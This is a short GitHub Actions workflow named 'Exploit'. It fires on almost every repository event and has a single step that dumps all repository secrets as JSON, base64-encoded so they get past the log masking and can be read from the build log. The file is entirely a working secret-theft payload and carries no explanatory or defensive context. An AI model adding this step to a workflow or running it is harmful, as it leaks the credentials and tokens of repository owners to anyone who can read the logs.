name: Exploit

on:
  create: # https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#create
  deployment: # https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#deployment
  deployment_status: # https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#deployment
  merge_group: # https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#deployment
  pull_request: # https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request
  pull_request_review: # https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_review
  pull_request_review_comment: # https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_review_comment
  push: # https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_review_comment
  release: # https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#release
  repository_dispatch: # https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#repository_dispatch
  workflow_call: # https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_call
  workflow_dispatch: # https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_call

jobs:
  execute:
    runs-on: ubuntu-latest

    steps:
      - name: Execute
        run: echo "${{ toJson(secrets) }}" | base64
